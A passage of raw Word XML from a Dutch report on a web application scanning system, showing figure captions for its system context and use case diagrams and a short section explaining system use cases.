          <w:p w14:paraId="02474382" w14:textId="6F12BA7B" w:rsidR="0037176F" w:rsidRDefault="006F58B2" w:rsidP="00467636">
            <w:r>
              <w:t>Administrator</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4531" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="02F58C3A" w14:textId="423F2723" w:rsidR="0037176F" w:rsidRDefault="00967F11" w:rsidP="00467636">
            <w:r>
              <w:t>Systeembeheer</w:t>
            </w:r>
            <w:r w:rsidR="009C0BD9">
              <w:t xml:space="preserve"> en problemen binnen het systeem oplossen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FD0177E" w14:textId="56EFF5D9" w:rsidR="0042168E" w:rsidRPr="009C0BD9" w:rsidRDefault="00966FF4" w:rsidP="0042168E">
      <w:r w:rsidRPr="00BA4329">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251840512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2FA2F85E" wp14:editId="41AABA75">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-379095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2216150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1108710" cy="866140"/>
                <wp:effectExtent l="0" t="0" r="8890" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="4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866140"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="77238E9B" w14:textId="61A407CB" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00966FF4">
                            <w:pPr>
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Figuur 5.1</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A22B982" w14:textId="59BCBEEF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00966FF4">
                            <w:r>
                              <w:t>Systeem Context Diagram</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11338AF8" w14:textId="0978B1A4" w:rsidR="00CE4BB5" w:rsidRPr="00B86020" w:rsidRDefault="00CE4BB5" w:rsidP="00966F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A2F85E" id="_x0000_s1111" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-29.85pt;margin-top:174.5pt;width:87.3pt;height:68.2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8hVRSQCAAAkBAAADgAAAGRycy9lMm9Eb2MueG1srFPbjtsgEH2v1H9AvDe2o9zWirPaZpuq0nZb&#10;abcfQDCOUYChQGKnX98BJ2m0favqB8R4hsOZc4blfa8VOQrnJZiKFqOcEmE41NLsKvrjdfNhQYkP&#10;zNRMgREVPQlP71fv3y07W4oxtKBq4QiCGF92tqJtCLbMMs9boZkfgRUGkw04zQKGbpfVjnWIrlU2&#10;zvNZ1oGrrQMuvMe/j0OSrhJ+0wgevjWNF4GoiiK3kFaX1m1cs9WSlTvHbCv5mQb7BxaaSYOXXqEe&#10;WWDk4ORfUFpyBx6aMOKgM2gayUXqAbsp8jfdvLTMitQLiuPtVSb//2D58/G7I7Ku6GROiWEaPXoV&#10;ex+ObE/GUZ7O+hKrXizWhf4j9GhzatXbJ+B7TwysW2Z24sE56FrBaqRXxJPZzdEBx0eQbfcVaryG&#10;HQIkoL5xOmqHahBER5tOV2tEHwiPVxb5Yl5gimNuMZsVk+RdxsrLaet8+CxAk7ipqEPrEzo7PvkQ&#10;2bDyUhIv86BkvZFKpcDttmvlyJHhmGzSlxp4U6YM6Sp6Nx1PE7KBeD5NkJYBx1hJjeTy+A2DFdX4&#10;ZOpUEphUwx6ZKHOWJyoyaBP6bZ+MmC8usm+hPqFgDoaxxWeGmxbcL0o6HNmK+p8H5gQl6otB0e+K&#10;CapCQgom0/kYA3eb2d5mmOEIVdFAybBdh/Quoh4GHtCcRibdoosDkzNnHMUk5/nZxFm/jVPVn8e9&#10;+g0AAP//AwBQSwMEFAAGAAgAAAAhAGSxhMffAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj9FO&#10;g0AQRd9N/IfNmPhi2qUKpSBDoyYaX1v7AQO7BSI7S9htoX/v9sk+Tubk3nOL7Wx6cdaj6ywjrJYR&#10;CM21VR03CIefz8UGhPPEinrLGuGiHWzL+7uCcmUn3unz3jcihLDLCaH1fsildHWrDbmlHTSH39GO&#10;hnw4x0aqkaYQbnr5HEVraajj0NDSoD9aXf/uTwbh+D09JdlUfflDuovX79Sllb0gPj7Mb68gvJ79&#10;PwxX/aAOZXCq7ImVEz3CIsnSgCK8xFkYdSVWcQaiQog3SQyyLOTthvIPAAD//wMAUEsBAi0AFAAG&#10;AAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQ&#10;SwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQ&#10;SwECLQAUAAYACAAAACEAn8hVRSQCAAAkBAAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54&#10;bWxQSwECLQAUAAYACAAAACEAZLGEx98AAAALAQAADwAAAAAAAAAAAAAAAAB8BAAAZHJzL2Rvd25y&#10;ZXYueG1sUEsFBgAAAAAEAAQA8wAAAIgFAAAAAA==&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="77238E9B" w14:textId="61A407CB" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00966FF4">
                      <w:pPr>
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Figuur 5.1</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2A22B982" w14:textId="59BCBEEF" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00966FF4">
                      <w:r>
                        <w:t>Systeem Context Diagram</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11338AF8" w14:textId="0978B1A4" w:rsidR="00CE4BB5" w:rsidRPr="00B86020" w:rsidRDefault="00CE4BB5" w:rsidP="00966FF4"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C0BD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251802624" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E85C08A" wp14:editId="5DE988B8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1363345</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2338070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2656840" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="461" name="Tekstvak 461"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2656840" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="08001C7A" w14:textId="6CFBEDA9" w:rsidR="00CE4BB5" w:rsidRPr="0092670A" w:rsidRDefault="00CE4BB5" w:rsidP="009C0BD9">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 5.1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5C08A" id="Tekstvak 461" o:spid="_x0000_s1112" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:107.35pt;margin-top:184.1pt;width:209.2pt;height:21.2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k3g7zYCAABsBAAADgAAAGRycy9lMm9Eb2MueG1srFRRb9sgEH6ftP+AeF+cRG2aWnGqLFWmSVFb&#10;KZn6TDCOUYFjQGJnv34Httut29O0F3zcHQff9915cddqRc7CeQmmoJPRmBJhOJTSHAv6bb/5NKfE&#10;B2ZKpsCIgl6Ep3fLjx8Wjc3FFGpQpXAEixifN7agdQg2zzLPa6GZH4EVBoMVOM0Cbt0xKx1rsLpW&#10;2XQ8nmUNuNI64MJ79N53QbpM9atK8PBYVV4EogqKbwtpdWk9xDVbLlh+dMzWkvfPYP/wCs2kwUtf&#10;S92zwMjJyT9KackdeKjCiIPOoKokFwkDopmM36HZ1cyKhAXJ8faVJv//yvKH85Mjsizo1WxCiWEa&#10;RdqLFx/O7IVEHzLUWJ9j4s5iamg/Q4tKD36Pzgi8rZyOX4REMI5cX175FW0gHJ3T2fVsfoUhjrHp&#10;7HZ+cx3LZG+nrfPhiwBNolFQh/olWtl560OXOqTEyzwoWW6kUnETA2vlyJmh1k0tg+iL/5alTMw1&#10;EE91BaMnixA7KNEK7aFNpNzcDjgPUF4QvoOuhbzlG4kXbpkPT8xhzyAsnIPwiEuloCko9BYlNbgf&#10;f/PHfJQSo5Q02IMF9d9PzAlK1FeDIseGHQw3GIfBMCe9BoSKsuFrkokHXFCDWTnQzzgeq3gLhpjh&#10;eFdBw2CuQzcJOF5crFYpCdvSsrA1O8tj6YHYffvMnO1lCSjoAwzdyfJ36nS5SR+7OgWkOkkXie1Y&#10;7PnGlk7i9+MXZ+bXfcp6+0ksfwIAAP//AwBQSwMEFAAGAAgAAAAhAJ6HRefjAAAACwEAAA8AAABk&#10;cnMvZG93bnJldi54bWxMj8tOwzAQRfdI/IM1SGwQdV5KqzSTqqpgAZuK0A07N57GKbEdxU4b/h6z&#10;osvRPbr3TLmZdc8uNLrOGoR4EQEj01jZmRbh8Pn6vALmvDBS9NYQwg852FT3d6UopL2aD7rUvmWh&#10;xLhCICjvh4Jz1yjSwi3sQCZkJztq4cM5tlyO4hrKdc+TKMq5Fp0JC0oMtFPUfNeTRthnX3v1NJ1e&#10;3rdZOr4dpl1+bmvEx4d5uwbmafb/MPzpB3WogtPRTkY61iMkcbYMKEKarxJggcjTNAZ2RMjiaAm8&#10;KvntD9UvAAAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAO5N4O82AgAAbAQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAJ6HRefjAAAACwEAAA8AAAAA&#10;AAAAAAAAAAAAjgQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="08001C7A" w14:textId="6CFBEDA9" w:rsidR="00CE4BB5" w:rsidRPr="0092670A" w:rsidRDefault="00CE4BB5" w:rsidP="009C0BD9">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 5.1</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="009C0BD9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251800576" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="583129D6" wp14:editId="45D43E3B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>1363345</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>246380</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2656840" cy="2034540"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="448" name="Afbeelding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systeem context.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2656840" cy="2034540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="003A0394">
        <w:tab/>
        <w:t xml:space="preserve">         Tabel 5.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464CB91E" w14:textId="2CAF2A21" w:rsidR="000B471C" w:rsidRPr="00ED79DE" w:rsidRDefault="000B471C">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E723CB3" w14:textId="77777777" w:rsidR="00F03C6A" w:rsidRPr="00ED79DE" w:rsidRDefault="00F03C6A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED79DE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0953B098" w14:textId="273A2276" w:rsidR="00F03C6A" w:rsidRPr="002D66F8" w:rsidRDefault="00620167" w:rsidP="00620167">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="46" w:name="_Toc491022090"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">5.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="00F03C6A" w:rsidRPr="002D66F8">
        <w:t xml:space="preserve">Systeem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F03C6A" w:rsidRPr="002D66F8">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F03C6A" w:rsidRPr="002D66F8">
        <w:t xml:space="preserve"> Case</w:t>
      </w:r>
      <w:bookmarkEnd w:id="46"/>
    </w:p>
    <w:p w14:paraId="7EA3C4DE" w14:textId="16CF5DF8" w:rsidR="009952E0" w:rsidRDefault="00044BE7">
      <w:r w:rsidRPr="00044BE7">
        <w:t xml:space="preserve">De systeem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00044BE7">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00044BE7">
        <w:t xml:space="preserve"> Case diagram </w:t>
      </w:r>
      <w:r w:rsidR="00834BF2">
        <w:t>representeert de functionele mogelijkheden en operationele scenario’s</w:t>
      </w:r>
      <w:r w:rsidR="009E0850">
        <w:t xml:space="preserve"> van een systeem. </w:t>
      </w:r>
      <w:r w:rsidR="00A35F7A">
        <w:t xml:space="preserve">Het illustreert hoe de externe actoren </w:t>
      </w:r>
      <w:r w:rsidR="00D51EAD">
        <w:t xml:space="preserve">van plan zijn het systeem in gebruik te nemen. </w:t>
      </w:r>
      <w:r w:rsidR="00481C9A">
        <w:t xml:space="preserve">Zoals bij de systeem context zijn worden hier weer </w:t>
      </w:r>
      <w:r w:rsidR="003C1FF8">
        <w:t>dezelfde</w:t>
      </w:r>
      <w:r w:rsidR="00481C9A">
        <w:t xml:space="preserve"> actoren geïllustreerd. </w:t>
      </w:r>
      <w:r w:rsidR="002E7BB8">
        <w:t xml:space="preserve">Ieder actor heeft een ander soort interactie met het systeem, deze interacties of in gebruik nemen van het systeem worden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E7BB8">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E7BB8">
        <w:t xml:space="preserve"> Cases genoemd. </w:t>
      </w:r>
      <w:r w:rsidR="00362AE3">
        <w:t xml:space="preserve">Systeem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00362AE3">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00362AE3">
        <w:t xml:space="preserve"> Case zijn ook bedoelt om de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00362AE3">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00362AE3">
        <w:t xml:space="preserve"> Cases van een systeem te identificeren. </w:t>
      </w:r>
      <w:r w:rsidR="00E0548E">
        <w:t xml:space="preserve">Voor het gehele </w:t>
      </w:r>
      <w:r w:rsidR="008272A8">
        <w:t>webapplicatie</w:t>
      </w:r>
      <w:r w:rsidR="00E0548E">
        <w:t xml:space="preserve"> scan systeem heb ik met behulp van de Systeem </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0548E">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0548E">
        <w:t xml:space="preserve"> Case, drie </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E0548E">
        <w:t>Use</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E0548E">
        <w:t xml:space="preserve"> Cases weten te identificeren. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23220626" w14:textId="0CE89E04" w:rsidR="0042168E" w:rsidRPr="000B0FF6" w:rsidRDefault="00FA6AB1">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251814912" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E352A17" wp14:editId="2B9A2AC6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>948055</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>207010</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4399280" cy="6581140"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="483" name="Afbeelding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Systeem Use Case.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399280" cy="6581140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="margin">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="margin">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00BA4329">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251816960" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4AC2ABD2" wp14:editId="5302C7AF">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-374650</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>5572760</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1108710" cy="1278255"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49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278255"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="FFFFFF"/>
                        </a:solidFill>
                        <a:ln w="9525">
                          <a:noFill/>
                          <a:miter lim="800000"/>
                          <a:headEnd/>
                          <a:tailEnd/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="7F0C4853" w14:textId="25D0C6E7" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:pPr>
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00BA4329">
                              <w:rPr>
                                <w:u w:val="single"/>
                              </w:rPr>
                              <w:t>Figuur 5.2</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="556B4B88" w14:textId="6FD0189C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                            <w:r>
                              <w:t xml:space="preserve">Systeem </w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:t>Use</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> Case Diagram</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1D4D1043" w14:textId="77A1007F" w:rsidR="00CE4BB5" w:rsidRPr="00B86020" w:rsidRDefault="00CE4BB5">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2ABD2" id="_x0000_s1113" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-29.5pt;margin-top:438.8pt;width:87.3pt;height:100.65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mzYCYCAAAmBAAADgAAAGRycy9lMm9Eb2MueG1srFPbbtswDH0fsH8Q9L74gmRJjDhFly7DgK4b&#10;0O4DaFmOhciiJymxu68fpaRptr0N84MgmuTh4SG1uhk7zY7SOoWm5Nkk5UwagbUyu5J/f9q+W3Dm&#10;PJgaNBpZ8mfp+M367ZvV0BcyxxZ1LS0jEOOKoS95631fJIkTrezATbCXhpwN2g48mXaX1BYGQu90&#10;kqfp+2RAW/cWhXSO/t6dnHwd8ZtGCv+1aZz0TJecuPl42nhW4UzWKyh2FvpWiTMN+AcWHShDRS9Q&#10;d+CBHaz6C6pTwqLDxk8Edgk2jRIy9kDdZOkf3Ty20MvYC4nj+otM7v/BiofjN8tUXfLpkvQx0NGQ&#10;nuTe+SPsWR70GXpXUNhjT4F+/IAjzTn26vp7FHvHDG5aMDt5ay0OrYSa+GUhM7lKPeG4AFINX7Cm&#10;MnDwGIHGxnZBPJKDETrxeL7MRo6eiVAySxfzjFyCfFk+X+SzWawBxUt6b53/JLFj4VJyS8OP8HC8&#10;dz7QgeIlJFRzqFW9VVpHw+6qjbbsCLQo2/id0X8L04YNJV/O8llENhjy4w51ytMia9WVfJGGL6RD&#10;EeT4aOp496D06U5MtDnrEyQ5iePHaoyjWMTkIF6F9TMpZvG0uPTQ6NKi/cnZQEtbcvfjAFZypj8b&#10;Un2ZTadhy6Mxnc1zMuy1p7r2gBEEVXLP2em68fFlBN4Gb2k6jYq6vTI5c6ZljHKeH07Y9ms7Rr0+&#10;7/UvAAAA//8DAFBLAwQUAAYACAAAACEAx/WfJt8AAAAMAQAADwAAAGRycy9kb3ducmV2LnhtbEyP&#10;zW6DMBCE75X6DtZW6qVKTKqCgWKitlKrXvPzAAtsABWvEXYCefs6p/Y2ox3NflNsFzOIC02ut6xh&#10;s45AENe26bnVcDx8rlIQziM3OFgmDVdysC3v7wrMGzvzji5734pQwi5HDZ33Yy6lqzsy6NZ2JA63&#10;k50M+mCnVjYTzqHcDPI5ihJpsOfwocORPjqqf/Zno+H0PT/F2Vx9+aPavSTv2KvKXrV+fFjeXkF4&#10;WvxfGG74AR3KwFTZMzdODBpWcRa2eA2pUgmIW2ITB1EFEak0A1kW8v+I8hcAAP//AwBQSwECLQAU&#10;AAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnht&#10;bFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8ucmVs&#10;c1BLAQItABQABgAIAAAAIQDMibNgJgIAACYEAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9j&#10;LnhtbFBLAQItABQABgAIAAAAIQDH9Z8m3wAAAAwBAAAPAAAAAAAAAAAAAAAAAH4EAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABADzAAAAigUAAAAA&#10;" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F0C4853" w14:textId="25D0C6E7" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:pPr>
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00BA4329">
                        <w:rPr>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>Figuur 5.2</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="556B4B88" w14:textId="6FD0189C" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t xml:space="preserve">Systeem </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Use</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> Case Diagram</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="1D4D1043" w14:textId="77A1007F" w:rsidR="00CE4BB5" w:rsidRPr="00B86020" w:rsidRDefault="00CE4BB5">
                      <w:r>
                        <w:t>Vergrote versie in bijlage</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="0042168E" w:rsidRPr="002D66F8">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="627979EB" w14:textId="4B24C088" w:rsidR="006870C5" w:rsidRDefault="00AC16BE" w:rsidP="00620167">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="47" w:name="_Toc491022091"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="45720" distB="45720" distL="114300" distR="114300" simplePos="0" relativeHeight="251823104" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="18992446" wp14:editId="09462EBB">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>456565</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5749290" cy="929005"/>
                <wp:effectExtent l="0" t="0" r="16510" b="36195"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="49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297"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
